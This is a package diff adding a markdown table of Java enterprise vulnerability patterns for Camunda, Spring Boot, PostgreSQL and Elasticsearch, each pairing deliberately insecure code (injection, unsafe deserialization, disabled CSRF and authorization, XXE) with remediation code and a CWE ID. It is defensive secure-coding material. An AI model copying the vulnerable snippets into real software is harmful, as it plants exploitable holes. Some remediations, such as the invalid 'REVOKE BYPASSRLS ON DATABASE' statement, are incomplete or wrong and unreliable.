@runsec/mcp 1.0.35 → 1.0.37

package/dist/data/skills/java-enterprise/patterns.md

@@ -0,0 +1,816 @@
+| ID | Title | Vulnerable Code | Remediation | Domain | CWE |
+| :--- | :--- | :--- | :--- | :--- | :--- |
+> Remediation policy baseline for all rows: apply and verify **Least Privilege** and **Defense-in-depth** controls.
+| CAM-001 | Camunda Expression Injection via JUEL/Groovy Delegates | `String expr = request.getExpression();`<br>`runtimeService.startProcessInstanceByKey("payment", Variables.putValue("approvalExpr", expr));` | `String decisionKey = request.getDecisionKey();`<br>`if (!Set.of("ALLOW_FAST","REVIEW_MANUAL").contains(decisionKey)) throw new SecurityException("invalid decision");`<br>`runtimeService.startProcessInstanceByKey("payment", Variables.putValue("decisionKey", decisionKey));` | Camunda 7 - BPMN Execution | CWE-94 |
+| CAM-002 | PII Leakage in Process Variables and History | `runtimeService.setVariable(piId, "ssn", req.ssn());`<br>`historyService.createHistoricVariableInstanceQuery().list();` | `String tokenized = piiVault.tokenize(req.ssn());`<br>`runtimeService.setVariable(piId, "ssnToken", tokenized);`<br>`runtimeService.removeVariable(piId, "rawSsn");`<br>`// application.yaml: camunda.bpm.history-level=audit`<br>`// enforce retention/cleanup and field-level minimization` | Camunda 7 - Data Protection | CWE-200 |
+| CAM-003 | XXE in BPMN Deployment Parsing | `RepositoryService repo = processEngine.getRepositoryService();`<br>`repo.createDeployment().addInputStream("process.bpmn", userUploadedXml).deploy();` | `DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();`<br>`f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);`<br>`f.setFeature("http://xml.org/sax/features/external-general-entities", false);`<br>`f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);`<br>`f.setXIncludeAware(false);`<br>`Document safeDoc = f.newDocumentBuilder().parse(userUploadedXml);`<br>`repo.createDeployment().addModelInstance("process.bpmn", Bpmn.readModelFromStream(toStream(safeDoc))).deploy();` | Camunda 7 - BPMN Deployment | CWE-611 |
+| CAM-004 | Unauthorized Task Claim/Complete via Identity Links | `taskService.claim(taskId, currentUser);`<br>`taskService.complete(taskId, vars);` | `Task task = taskService.createTaskQuery().taskId(taskId).singleResult();`<br>`boolean allowed = taskService.getIdentityLinksForTask(taskId).stream()`<br>`.anyMatch(l -> "candidate".equals(l.getType()) && userHasIdentityLink(currentUser, l));`<br>`if (!allowed) throw new AccessDeniedException("Not task candidate");`<br>`authorizationService.createAuthorizationQuery().userIdIn(currentUser).resourceType(Resources.TASK).resourceId(taskId).list();`<br>`taskService.claim(taskId, currentUser);`<br>`taskService.complete(taskId, vars);` | Camunda 7 - Authorization | CWE-285 |
+| SPR-001 | Unsafe Jackson Polymorphic Deserialization | `ObjectMapper mapper = new ObjectMapper();`<br>`mapper.activateDefaultTyping(LaissezFaireSubTypeValidator.instance, ObjectMapper.DefaultTyping.NON_FINAL);`<br>`Object body = mapper.readValue(json, Object.class);` | `ObjectMapper mapper = JsonMapper.builder().build();`<br>`mapper.deactivateDefaultTyping();`<br>`PaymentRequest body = mapper.readValue(json, PaymentRequest.class);`<br>`@JsonIgnoreProperties(ignoreUnknown = true)`<br>`class PaymentRequest { @NotNull String iban; @Positive BigDecimal amount; }` | Spring Boot 3.x - Serialization | CWE-502 |
+| SPR-002 | CSRF Disabled for Browser Session Endpoints | `http.csrf(csrf -> csrf.disable())`<br>`.authorizeHttpRequests(a -> a.requestMatchers("/ui/**").authenticated());` | `http.securityMatcher("/ui/**")`<br>`.csrf(csrf -> csrf.csrfTokenRepository(CookieCsrfTokenRepository.withHttpOnlyFalse()))`<br>`.authorizeHttpRequests(a -> a.requestMatchers("/ui/**").authenticated());`<br>`http.securityMatcher("/api/**")`<br>`.csrf(csrf -> csrf.disable())`<br>`.sessionManagement(s -> s.sessionCreationPolicy(SessionCreationPolicy.STATELESS));` | Spring Boot 3.x - Web Security | CWE-352 |
+| SPR-003 | Mass Assignment via Dynamic Property Binding | `@PatchMapping("/users/{id}")`<br>`public User update(@PathVariable Long id, @RequestBody Map<String, Object> in) {`<br>`  BeanUtils.populate(userRepo.getReferenceById(id), in);`<br>`  return userRepo.save(...);`<br>`}` | `record UserPatchRequest(@Email String email, @Size(max=80) String displayName) {}`<br>`@PatchMapping("/users/{id}")`<br>`@PreAuthorize("#id == authentication.principal.userId or hasRole('ADMIN')")`<br>`public User update(@PathVariable Long id, @Valid @RequestBody UserPatchRequest in) {`<br>`  User u = userRepo.getReferenceById(id);`<br>`  u.setEmail(in.email());`<br>`  u.setDisplayName(in.displayName());`<br>`  return userRepo.save(u);`<br>`}` | Spring Boot 3.x - API Input Binding | CWE-915 |
+| SPR-004 | Verbose Error Responses Leak Secrets and Internals | `@ExceptionHandler(Exception.class)`<br>`ResponseEntity<Map<String,String>> e(Exception ex){`<br>`  return ResponseEntity.status(500).body(Map.of("error", ex.getMessage(), "trace", stackTrace(ex)));`<br>`}` | `@ExceptionHandler(Exception.class)`<br>`ResponseEntity<ProblemDetail> e(Exception ex){`<br>`  String ref = UUID.randomUUID().toString();`<br>`  log.error("ref={} request failed", ref, ex);`<br>`  ProblemDetail pd = ProblemDetail.forStatus(500);`<br>`  pd.setTitle("Internal Server Error");`<br>`  pd.setDetail("Request failed. Reference: " + ref);`<br>`  return ResponseEntity.status(500).body(pd);`<br>`}`<br>`// application.yaml: server.error.include-message=never` | Spring Boot 3.x - Error Handling | CWE-209 |
+| DB-001 | SQL Injection in Dynamic Native Query Construction | `String q = "select * from orders where status = '" + status + "' and tenant_id=" + tenantId;`<br>`entityManager.createNativeQuery(q, Order.class).getResultList();` | `String q = "select * from orders where status = :status and tenant_id = :tenantId";`<br>`entityManager.createNativeQuery(q, Order.class)`<br>`.setParameter("status", status)`<br>`.setParameter("tenantId", tenantId)`<br>`.getResultList();`<br>`// for dynamic sort, map user input to allowlisted column names` | PostgreSQL 16 - Query Layer | CWE-89 |
+| DB-002 | RLS Bypass by Sharing Superuser/Owner Connection | `spring.datasource.username=app_owner`<br>`// app_owner owns tables, bypassing policy intent in many deployments` | `-- DB hardening`<br>`CREATE ROLE app_runtime NOINHERIT LOGIN PASSWORD '...';`<br>`REVOKE BYPASSRLS ON DATABASE appdb FROM app_runtime;`<br>`ALTER TABLE invoice ENABLE ROW LEVEL SECURITY;`<br>`CREATE POLICY tenant_iso ON invoice USING (tenant_id = current_setting('app.tenant_id')::uuid);`<br>`-- Per request`<br>`SET app.tenant_id = :tenantId;`<br>`SET row_security = on;` | PostgreSQL 16 - Access Control | CWE-284 |
+| DB-003 | Sensitive Data Stored Unencrypted at Rest | `CREATE TABLE customer_secret (`<br>`  id uuid primary key,`<br>`  pan text not null`<br>`);` | `CREATE EXTENSION IF NOT EXISTS pgcrypto;`<br>`CREATE TABLE customer_secret (`<br>`  id uuid primary key,`<br>`  pan_enc bytea not null`<br>`);`<br>`INSERT INTO customer_secret(id, pan_enc) VALUES (:id, pgp_sym_encrypt(:pan, current_setting('app.enc_key')));`<br>`SELECT pgp_sym_decrypt(pan_enc, current_setting('app.enc_key')) FROM customer_secret WHERE id=:id;`<br>`-- keys from KMS/HSM, rotation policy, restricted key access` | PostgreSQL 16 - Data-at-Rest | CWE-311 |
+| ES-001 | Query DSL Injection via User-Controlled JSON | `String body = request.getParameter("q");`<br>`esClient.search(new SearchRequest("orders"), RequestOptions.DEFAULT, body);` | `String term = request.getParameter("term");`<br>`if (!term.matches("^[\\\\p{L}0-9 _-]{1,64}")) throw new IllegalArgumentException("invalid term");`<br>`SearchSourceBuilder src = new SearchSourceBuilder().query(QueryBuilders.matchQuery("name", term));`<br>`SearchRequest req = new SearchRequest("orders").source(src);`<br>`esClient.search(req, RequestOptions.DEFAULT);` | Elasticsearch 7 - Search API | CWE-74 |
+| ES-002 | Elasticsearch Endpoint Exposed Without Authentication | `xpack.security.enabled: false`<br>`http.host: 0.0.0.0` | `xpack.security.enabled: true`<br>`xpack.security.transport.ssl.enabled: true`<br>`xpack.security.http.ssl.enabled: true`<br>`# restrict network + reverse proxy + service account`<br>`# Spring Boot: use least-privileged API key per service` | Elasticsearch 7 - Access Security | CWE-306 |
+| ES-003 | Sensitive Fields Written to Logs and Indexed Audit Streams | `log.info("indexing customer payload={}", objectMapper.writeValueAsString(customer));`<br>`indexRequest.source(customerMap);` | `Map<String,Object> safe = redact(customerMap, Set.of("ssn","pan","token","password"));`<br>`log.info("indexing customer id={} fields={}", customerId, safe.keySet());`<br>`indexRequest.source(safe);`<br>`// enable structured logging policy + denylist filters in appender` | Elasticsearch 7 - Logging/Data Exposure | CWE-532 |
+
+| SPR-005 | IDOR via Direct `findById` in Controller | `@GetMapping("/api/orders/{id}")`<br>`Order o = orderRepo.findById(id).orElseThrow();`<br>`return OrderDto.of(o);` | `record PrincipalRef(UUID userId, Set<String> roles) {}`<br>`@GetMapping("/api/orders/{id}")`<br>`@PreAuthorize("hasAuthority('order:read')")`<br>`Order o = orderRepo.findByIdAndOwnerId(id, currentUserId()).orElseThrow(() -> new AccessDeniedException("forbidden"));`<br>`return OrderDto.of(o);` | Spring Boot 3.3 - IDOR/API | CWE-639 |
+| SPR-006 | IDOR in Nested Resource Mapping | `@DeleteMapping("/users/{uid}/cards/{cardId}")`<br>`cardRepo.deleteById(cardId);` | `@DeleteMapping("/users/{uid}/cards/{cardId}")`<br>`@PreAuthorize("#uid == authentication.principal.userId")`<br>`int n = cardRepo.deleteOwnedCard(uid, cardId);`<br>`if (n == 0) throw new AccessDeniedException("card not owned");` | Spring Boot 3.3 - IDOR/API | CWE-639 |
+| SPR-007 | IDOR in Spring Data REST Exported Repository | `@RepositoryRestResource(path="invoices")`<br>`interface InvoiceRepo extends JpaRepository<Invoice, UUID> {}` | `@RepositoryRestResource(path="invoices", exported=false)`<br>`interface InvoiceRepo extends JpaRepository<Invoice, UUID> {`<br>`  @PostFilter("filterObject.tenantId == authentication.principal.tenantId")`<br>`  List<Invoice> findAll();`<br>`}`<br>`// expose only service-layer endpoints with tenant-aware predicates` | Spring Boot 3.3 - Spring Data REST | CWE-639 |
+| SPR-008 | IDOR through GraphQL Resolver Parameter | `@QueryMapping`<br>`Order order(@Argument UUID id){ return repo.findById(id).orElseThrow(); }` | `@QueryMapping`<br>`Order order(@Argument UUID id){`<br>`  return repo.findByIdAndTenantId(id, tenantFromAuth()).orElseThrow(() -> new AccessDeniedException("forbidden"));`<br>`}` | Spring Boot 3.3 - GraphQL Access Control | CWE-639 |
+| SPR-009 | IDOR in File Download Endpoint | `Path p = storage.resolve(request.getParameter("docId"));`<br>`return Files.readAllBytes(p);` | `record DocRequest(UUID id) {}`<br>`DocRequest req = new DocRequest(UUID.fromString(docId));`<br>`DocumentMeta m = docRepo.findByIdAndOwnerId(req.id(), currentUserId()).orElseThrow(() -> new AccessDeniedException("forbidden"));`<br>`return secureStore.read(m.storageKey());` | Spring Boot 3.3 - Object Storage Access | CWE-639 |
+| SPR-010 | IDOR via Bulk Update IDs from Client | `@PostMapping("/accounts/lock")`<br>`void lock(@RequestBody List<Long> ids){ service.lock(ids); }` | `record LockRequest(List<Long> ids) {}`<br>`@PostMapping("/accounts/lock")`<br>`@PreAuthorize("hasRole('ADMIN')")`<br>`void lock(@Valid @RequestBody LockRequest r){`<br>`  List<Long> allowed = accountRepo.filterIdsByTenantAndRole(r.ids(), tenantFromAuth(), roleFromAuth());`<br>`  service.lock(allowed);`<br>`}` | Spring Boot 3.3 - Authorization Logic | CWE-639 |
+| SPR-011 | IDOR in Caching Layer Keyed by Object ID Only | `@Cacheable("profile")`<br>`public Profile getProfile(UUID id){ ... }` | `@Cacheable(cacheNames="profile", key="T(java.lang.String).format('%s:%s', #tenantId, #id)")`<br>`public Profile getProfile(UUID tenantId, UUID id){`<br>`  return repo.findByIdAndTenantId(id, tenantId).orElseThrow(() -> new AccessDeniedException("forbidden"));`<br>`}` | Spring Boot 3.3 - Cache Isolation | CWE-639 |
+| SPR-012 | IDOR in WebSocket Subscription Topic | `registry.enableSimpleBroker("/topic");`<br>`// client subscribes /topic/orders.{orderId}` | `@MessageMapping("/orders/{orderId}")`<br>`public void stream(@DestinationVariable UUID orderId, Principal p){`<br>`  if (!acl.canReadOrder(p, orderId)) throw new AccessDeniedException("forbidden");`<br>`}`<br>`registry.enableSimpleBroker("/user/queue");` | Spring Boot 3.3 - Messaging/AuthZ | CWE-639 |
+| CAM-005 | Listener Order Flaw: `end` Listener Commits Before External Publish | `outboxPublisher.publish("APPROVED", execution.getProcessBusinessKey());` | `TransactionSynchronizationManager.registerSynchronization(new TransactionSynchronization(){`<br>`  @Override public void afterCommit(){ outboxRepo.insert(eventRecord); }`<br>`});` | Camunda 7.20 - Transaction Integrity | CWE-440 |
+| CAM-006 | Async Continuation Race Causes Duplicate Side Effects | `paymentService.capture(execution.getBusinessKey());` | `record CaptureCmd(String processInstanceId, String idemKey) {}`<br>`CaptureCmd cmd = new CaptureCmd(execution.getProcessInstanceId(), execution.getBusinessKey());`<br>`paymentService.captureOnce(cmd);` | Camunda 7.20 - Async Job Semantics | CWE-440 |
+| CAM-007 | Non-transactional Delegate Updates External State then Throws BPMN Error | `bankApi.debit(...);`<br>`throw new BpmnError("DECLINED");` | `outboxRepo.save(DebitRequested.of(...));` | Camunda 7.20 - Saga/Consistency | CWE-440 |
+| CAM-008 | Variable Shadowing Across Scopes Alters Authorization Path | `execution.setVariableLocal("approved", true);` | `enum ProcVar { APPROVED, OWNER_ID }`<br>`execution.setVariable(ProcVar.APPROVED.name(), Boolean.TRUE);`<br>`Boolean approved = (Boolean) execution.getVariable(ProcVar.APPROVED.name());` | Camunda 7.20 - Process Logic Integrity | CWE-440 |
+| CAM-009 | Task Listener Performs Privileged Action Before Identity Check | `userService.promote(task.getAssignee());` | `String uid = identityService.getCurrentAuthentication().getUserId();`<br>`if(!acl.canEscalate(uid, task.getId())) throw new AccessDeniedException("forbidden");`<br>`userService.promote(uid);` | Camunda 7.20 - Listener Authorization | CWE-440 |
+| CAM-010 | Compensation Handler Executes with Stale Variables | `refund(execution.getVariable("amount"));` | `record RefundSnapshot(String txId, BigDecimal amount, String currency) {}`<br>`RefundSnapshot snap = snapshotRepo.loadByBusinessKey(execution.getBusinessKey());`<br>`refundService.refund(snap);` | Camunda 7.20 - Compensation Safety | CWE-440 |
+| SPR-013 | Weak PBE Algorithm in Config Decryption | `StringEncryptor e = new PooledPBEStringEncryptor();`<br>`e.setAlgorithm("PBEWithMD5AndDES");` | `var f = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA512");`<br>`var spec = new PBEKeySpec(password, salt, 310000, 256);`<br>`SecretKey k = f.generateSecret(spec);`<br>`// use AES/GCM with random 96-bit IV per value` | Spring Boot 3.3 - Cryptography | CWE-327 |
+| SPR-014 | Hardcoded Salt Enables Offline Cracking Across Environments | `byte[] salt = "fixed-salt-prod".getBytes(UTF_8);`<br>`var spec = new PBEKeySpec(pwd, salt, 10000, 128);` | `byte[] salt = SecureRandom.getInstanceStrong().generateSeed(16);`<br>`record EncEnvelope(byte[] salt, byte[] iv, byte[] ct, byte[] tag) {}`<br>`EncEnvelope env = crypto.encrypt(pwd, plaintext, salt);`<br>`// store per-record salt + rotate KMS-wrapped master key` | Spring Boot 3.3 - Cryptography | CWE-327 |
+| SPR-015 | Crypto Key Derived Once and Shared Globally via Static Mutable Field | `static SecretKey appKey;`<br>`if(appKey==null) appKey = derive(password);` | `private static final ScopedValue<SecretKey> REQ_KEY = ScopedValue.newInstance();`<br>`ScopedValue.where(REQ_KEY, keyProvider.forTenant(tenantId)).run(() -> service.handle(req));`<br>`// per-request/per-tenant key context avoids cross-tenant bleed` | Spring Boot 3.3 - Key Management | CWE-327 |
+| SPR-016 | XXE in JAXB/XML Decoder for API Imports | `Unmarshaller u = JAXBContext.newInstance(Model.class).createUnmarshaller();`<br>`Model m = (Model) u.unmarshal(inputStream);` | `SAXParserFactory spf = SAXParserFactory.newInstance();`<br>`spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);`<br>`spf.setFeature("http://xml.org/sax/features/external-general-entities", false);`<br>`XMLReader xr = spf.newSAXParser().getXMLReader();`<br>`Source safe = new SAXSource(xr, new InputSource(inputStream));`<br>`Model m = (Model) u.unmarshal(safe);` | Java 21/Spring Boot 3.3 - XML Parsing | CWE-611 |
+| SPR-017 | XSLT Injection from User-Supplied Stylesheet | `Transformer t = TransformerFactory.newInstance().newTransformer(new StreamSource(userXslt));`<br>`t.transform(new StreamSource(xml), out);` | `TransformerFactory tf = TransformerFactory.newInstance();`<br>`tf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);`<br>`tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");`<br>`tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");`<br>`Templates tpl = tf.newTemplates(new StreamSource(allowlistedXsltPath));`<br>`tpl.newTransformer().transform(new StreamSource(xml), out);` | Java 21/Spring Boot 3.3 - XSLT Engine | CWE-91 |
+| SPR-018 | XPath Injection in XML Authorization Rules | `String user = req.getParameter("user");`<br>`String expr = "//account[user/text()='" + user + "']/@role";`<br>`xpath.evaluate(expr, doc);` | `XPathExpression expr = xpath.compile("//account[user/text()='...']/@role");`<br>`// bind trusted variable value through resolver/context (omitted here)`<br>`String role = (String) expr.evaluate(doc, XPathConstants.STRING);` | Java 21/Spring Boot 3.3 - XML Query Safety | CWE-91 |
+| SPR-019 | XML Signature Wrapping (XSW) in SAML-like Flow | `Element assertion = (Element) doc.getElementsByTagName("Assertion").item(0);`<br>`if (verifySignature(doc)) accept(assertion);` | `Element signed = xmlSigService.resolveSignedElementById(doc, expectedId);`<br>`if (!xmlSigService.verifyReferenceUri(doc, expectedId)) throw new SecurityException();`<br>`accept(signed);`<br>`// bind business logic to the actually signed node` | Java 21/Spring Boot 3.3 - XML Signature Validation | CWE-91 |
+| SPR-020 | External Entity Expansion via `XMLInputFactory` Defaults | `XMLInputFactory xif = XMLInputFactory.newFactory();`<br>`XMLStreamReader xsr = xif.createXMLStreamReader(input);` | `XMLInputFactory xif = XMLInputFactory.newFactory();`<br>`xif.setProperty(XMLInputFactory.SUPPORT_DTD, false);`<br>`xif.setProperty("javax.xml.stream.isSupportingExternalEntities", false);`<br>`XMLStreamReader xsr = xif.createXMLStreamReader(input);` | Java 21/Spring Boot 3.3 - StAX Hardening | CWE-611 |
+| CAM-011 | Signal Spoofing via Unauthenticated `signalEventReceived` | `runtimeService.signalEventReceived("PaymentApproved");` | `record SignalCommand(String signal, String businessKey, String hmac) {}`<br>`SignalCommand c = req.toCommand();`<br>`if (!signalVerifier.verify(c.signal(), c.businessKey(), c.hmac())) throw new AccessDeniedException("bad signature");`<br>`runtimeService.createSignalEvent(c.signal()).processInstanceBusinessKey(c.businessKey()).send();` | Camunda 7.20 - Signal/AuthN | CWE-362 |
+| CAM-012 | Message Correlation Spoofing by Guessable Business Key | `runtimeService.createMessageCorrelation("InvoicePaid")`<br>`.processInstanceBusinessKey(req.businessKey())`<br>`.correlate();` | `record CorrelationRef(String businessKey, UUID nonce) {}`<br>`CorrelationRef ref = correlationRepo.load(req.token());`<br>`runtimeService.createMessageCorrelation("InvoicePaid")`<br>`.processInstanceBusinessKey(ref.businessKey())`<br>`.setVariable("corrNonce", ref.nonce())`<br>`.correlate();`<br>`// one-time token + nonce binding` | Camunda 7.20 - Message Security | CWE-362 |
+| CAM-013 | `asyncBefore` + External Callback Causes Double Completion | `gateway.charge();`<br>`runtimeService.createMessageCorrelation("ChargeAccepted").processInstanceId(piId).correlate();` | `record ChargeEvent(String idemKey, String state) {}`<br>`if (idemRepo.seen(idemKey)) return;`<br>`idemRepo.mark(idemKey, "ACCEPTED");`<br>`runtimeService.createMessageCorrelation("ChargeAccepted").processInstanceId(piId).correlate();` | Camunda 7.20 - Async Transaction Anomalies | CWE-362 |
+| CAM-014 | Recursive BPMN Call Activity Triggers Engine Resource Exhaustion | `String next = Objects.toString(execution.getVariable("nextProcess"), "");`<br>`runtimeService.startProcessInstanceByKey(next);` | `String next = Objects.toString(execution.getVariable("nextProcess"), "");`<br>`if (!allowedProcesses.contains(next)) throw new SecurityException();`<br>`Integer depth = (Integer) execution.getVariable("callDepth");`<br>`if (depth != null && depth > 5) throw new IllegalStateException("max depth");`<br>`execution.setVariable("callDepth", depth == null ? 1 : depth + 1);` | Camunda 7.20 - Resource Governance | CWE-400 |
+| CAM-015 | DelegateExpression Shared Mutable Field Race Across Jobs | `@Component("riskDelegate")`<br>`class RiskDelegate implements JavaDelegate {`<br>`  private Map<String,Object> cache = new HashMap<>();`<br>`}` | `@Component("riskDelegate")`<br>`class RiskDelegate implements JavaDelegate {`<br>`  private final ConcurrentMap<String,Object> cache = new ConcurrentHashMap<>();`<br>`  @Override public void execute(DelegateExecution ex){`<br>`    cache.computeIfAbsent(ex.getProcessInstanceId(), k -> compute(ex));`<br>`  }`<br>`}` | Camunda 7.20 - Delegate Concurrency | CWE-362 |
+| CAM-016 | Camunda Job Storm from Unbounded Failed Job Retries | `managementService.setJobRetries(jobId, 999);` | `managementService.setJobRetries(jobId, Math.min(currentRetries, 5));` | Camunda 7.20 - Retry Control | CWE-400 |
+| SPR-021 | SpEL Injection in Dynamic `@PreAuthorize` Expression Builder | `String expr = "hasRole('ADMIN') or " + req.rule();`<br>`methodSecurityExpressionHandler.setDefaultRolePrefix("");`<br>`@PreAuthorize("#{T(org.springframework.expression.spel.standard.SpelExpressionParser).new().parseExpression(@authz.expr()).getValue()}")` | `sealed interface AccessRule permits RoleRule, OwnerRule {}`<br>`record RoleRule(String role) implements AccessRule {}`<br>`record OwnerRule(UUID ownerId) implements AccessRule {}`<br>`boolean allowed = switch (rule) {`<br>`  case RoleRule r -> auth.hasRole(r.role());`<br>`  case OwnerRule o -> auth.userId().equals(o.ownerId());`<br>`};`<br>`if (!allowed) throw new AccessDeniedException("forbidden");` | Spring Boot 3.3 - SpEL/Authorization | CWE-917 |
+| SPR-022 | SpEL Injection via `@Value` on Untrusted Property Source | `@Value("#{...}")`<br>`private String evaluated;` | `record TenantRule(String mode, int limit) {}`<br>`@ConfigurationProperties(prefix="tenant")`<br>`record TenantProps(TenantRule rule) {}`<br>`// parse as typed config, never evaluate as expression` | Spring Boot 3.3 - Configuration Security | CWE-917 |
+| SPR-023 | SpEL Header Injection in Message Routing | `String route = parser.parseExpression(headers.get("route")).getValue(String.class);`<br>`jmsTemplate.convertAndSend(route, payload);` | `record Route(String value) {}`<br>`Route route = switch (headers.get("route")) {`<br>`  case String s when allowedRoutes.contains(s) -> new Route(s);`<br>`  default -> throw new IllegalArgumentException("bad route");`<br>`};`<br>`jmsTemplate.convertAndSend(route.value(), payload);` | Spring Boot 3.3 - Messaging Security | CWE-917 |
+| SPR-024 | Insecure Jackson Polymorphic Deserialization with MixIns | `mapper.activateDefaultTyping(ptv, DefaultTyping.EVERYTHING);`<br>`mapper.addMixIn(Object.class, TrustAll.class);`<br>`Object o = mapper.readValue(json, Object.class);` | `mapper.deactivateDefaultTyping();`<br>`record EventEnvelope(String type, JsonNode payload) {}`<br>`EventEnvelope env = mapper.readValue(json, EventEnvelope.class);`<br>`DomainEvent ev = switch (env.type()) {`<br>`  case "USER_LOCKED" -> mapper.treeToValue(env.payload(), UserLocked.class);`<br>`  case "INVOICE_PAID" -> mapper.treeToValue(env.payload(), InvoicePaid.class);`<br>`  default -> throw new SecurityException("unsupported type");`<br>`};` | Spring Boot 3.3 - Deserialization | CWE-502 |
+| SPR-025 | SnakeYAML Unsafe Type Construction (`load`) | `Yaml yaml = new Yaml();`<br>`Object cfg = yaml.load(userYaml);` | `LoaderOptions opts = new LoaderOptions();`<br>`opts.setAllowDuplicateKeys(false);`<br>`Yaml yaml = new Yaml(new SafeConstructor(opts));`<br>`Map<String,Object> cfg = yaml.load(userYaml);`<br>`// map to validated record DTO afterwards` | Spring Boot 3.3 - Deserialization | CWE-502 |
+| SPR-026 | XStream RCE through Wildcard Type Permissions | `XStream xs = new XStream();`<br>`xs.allowTypesByWildcard(new String[]{"**"});`<br>`Object o = xs.fromXML(xml);` | `XStream xs = new XStream();`<br>`xs.addPermission(NoTypePermission.NONE);`<br>`xs.allowTypes(new Class[]{OrderCreated.class, UserLocked.class});`<br>`Object o = xs.fromXML(xml);`<br>`if (!(o instanceof DomainEvent)) throw new SecurityException();` | Spring Boot 3.3 - Deserialization | CWE-502 |
+| SPR-027 | Resource Exhaustion via Unbounded Java Stream Generation | `Stream.iterate(seed, f).map(this::expand).forEach(this::store);` | `Stream.iterate(seed, f)`<br>`.limit(10_000)`<br>`.takeWhile(this::withinQuota)`<br>`.map(this::expand)`<br>`.forEach(this::store);`<br>`// enforce request quotas per tenant` | Spring Boot 3.3 - Compute Exhaustion | CWE-400 |
+| SPR-028 | EntityManager Leak in Custom Async Executor | `@Async void run(){`<br>`EntityManager em = emf.createEntityManager();`<br>`while(true){ em.createQuery("...").getResultList(); }`<br>`}` | `@Async void run(){`<br>`try (var scope = StructuredTaskScope.ShutdownOnFailure.open()) {`<br>`  scope.fork(() -> withEntityManager(this::processBatch));`<br>`  scope.join();`<br>`}`<br>`}`<br>`private <T> T withEntityManager(Supplier<T> s){`<br>`  EntityManager em = emf.createEntityManager();`<br>`  try { return s.get(); } finally { em.close(); }`<br>`}` | Spring Boot 3.3 - Resource Lifecycle | CWE-400 |
+| SPR-029 | Race Condition in Singleton Bean Accumulator | `@Service class TokenService {`<br>`  private long counter;`<br>`  String next(){ return "T-" + (++counter); }`<br>`}` | `@Service class TokenService {`<br>`  private final AtomicLong counter = new AtomicLong();`<br>`  String next(){ return "T-" + counter.incrementAndGet(); }`<br>`}` | Spring Boot 3.3 - Thread Safety | CWE-362 |
+| SPR-030 | Race in Check-Then-Act Cache Initialization | `if(cache.get(k)==null){ cache.put(k, load(k)); }` | `var value = cache.computeIfAbsent(k, this::load);`<br>`// prefer immutable cached value objects` | Spring Boot 3.3 - Thread Safety | CWE-362 |
+| SPR-031 | Mass Assignment via `@ModelAttribute` Sensitive Fields | `public String update(@ModelAttribute User u){`<br>`  userRepo.save(u);`<br>`}` | `record UserUpdateCmd(@Email String email, String displayName) {}`<br>`@InitBinder("userUpdateCmd")`<br>`void binder(WebDataBinder b){ b.setAllowedFields("email","displayName"); }`<br>`public String update(@Valid @ModelAttribute UserUpdateCmd cmd){ ... }` | Spring Boot 3.3 - Data Binding | CWE-915 |
+| SPR-032 | DataBinder Prototype Pollution via Nested Path Auto-Grow | `binder.setAutoGrowNestedPaths(true);`<br>`// attacker sets account.roles[999999].name` | `binder.setAutoGrowNestedPaths(false);`<br>`binder.setDisallowedFields("*.class.*","class.*","*.roles[*].*");`<br>`record SafePatch(String email, String displayName) {}`<br>`// map manually from SafePatch to domain model` | Spring Boot 3.3 - Data Binding | CWE-915 |
+| DB-006 | Deserialization Bomb Stored/Retrieved from JSONB | `String raw = rs.getString("payload");`<br>`Object o = mapper.readValue(raw, Object.class);` | `record PayloadEnvelope(String type, JsonNode body) {}`<br>`PayloadEnvelope p = mapper.readValue(raw, PayloadEnvelope.class);`<br>`DomainEvent ev = switch (p.type()) {`<br>`  case "A" -> mapper.treeToValue(p.body(), EventA.class);`<br>`  case "B" -> mapper.treeToValue(p.body(), EventB.class);`<br>`  default -> throw new SecurityException("bad type");`<br>`};` | PostgreSQL 16 - JSONB Processing | CWE-502 |
+| DB-007 | DB Connection Pool Starvation from Cursor/Stream Misuse | `Stream<Order> s = repo.streamAll();`<br>`s.forEach(this::heavyWork); // never closed` | `try (Stream<Order> s = repo.streamAllByTenant(tenantId)) {`<br>`  s.limit(5000).forEach(this::heavyWork);`<br>`}`<br>`// set statement timeout + fetch size` | PostgreSQL 16 - Resource Exhaustion | CWE-400 |
+| ES-004 | Thread-Unsafe Shared Request Builder in Elasticsearch Client | `static SearchSourceBuilder SHARED = new SearchSourceBuilder();`<br>`SHARED.query(userQuery);`<br>`client.search(new SearchRequest("idx").source(SHARED), DEFAULT);` | `SearchSourceBuilder src = new SearchSourceBuilder();`<br>`src.query(allowlistedQuery(userInput));`<br>`SearchRequest req = new SearchRequest("idx").source(src);`<br>`client.search(req, DEFAULT);` | Elasticsearch 7 - Concurrency Safety | CWE-362 |
+| CAM-017 | Missing `setAuthenticatedUserId` Enables Anonymous Task Completion | `@PostMapping("/camunda/task/{id}/complete")`<br>`taskService.complete(id, vars);` | `@PostMapping("/camunda/task/{id}/complete")`<br>`identityService.setAuthenticatedUserId(auth.getName());`<br>`try {`<br>`  commandContext.runWithoutAuthorization(() -> {}); // do not use for business ops`<br>`  if (!canComplete(auth.getName(), id)) throw new AccessDeniedException("forbidden");`<br>`  taskService.complete(id, vars);`<br>`} finally { identityService.clearAuthentication(); }` | Camunda 7.20 - AuthN/AuthZ | CWE-285 |
+| CAM-018 | Camunda REST Endpoint Disables `authorizationCheck` | `processEngineConfiguration.setAuthorizationEnabled(false);`<br>`runtimeService.createProcessInstanceQuery().list();` | `processEngineConfiguration.setAuthorizationEnabled(true);`<br>`identityService.setAuthenticatedUserId(auth.getName());`<br>`List<ProcessInstance> p = runtimeService.createProcessInstanceQuery().list();`<br>`identityService.clearAuthentication();` | Camunda 7.20 - Authorization Enforcement | CWE-285 |
+| CAM-019 | IDOR on Process Variables by Process Instance ID | `runtimeService.getVariables(procInstId);`<br>`// procInstId from request path` | `identityService.setAuthenticatedUserId(auth.getName());`<br>`boolean allowed = taskService.createTaskQuery().taskCandidateOrAssigned(auth.getName())`<br>`.processInstanceId(procInstId).count() > 0;`<br>`if (!allowed) throw new AccessDeniedException("forbidden");`<br>`Map<String,Object> vars = runtimeService.getVariables(procInstId, Set.of("publicStatus"));` | Camunda 7.20 - BOLA/Process Data | CWE-639 |
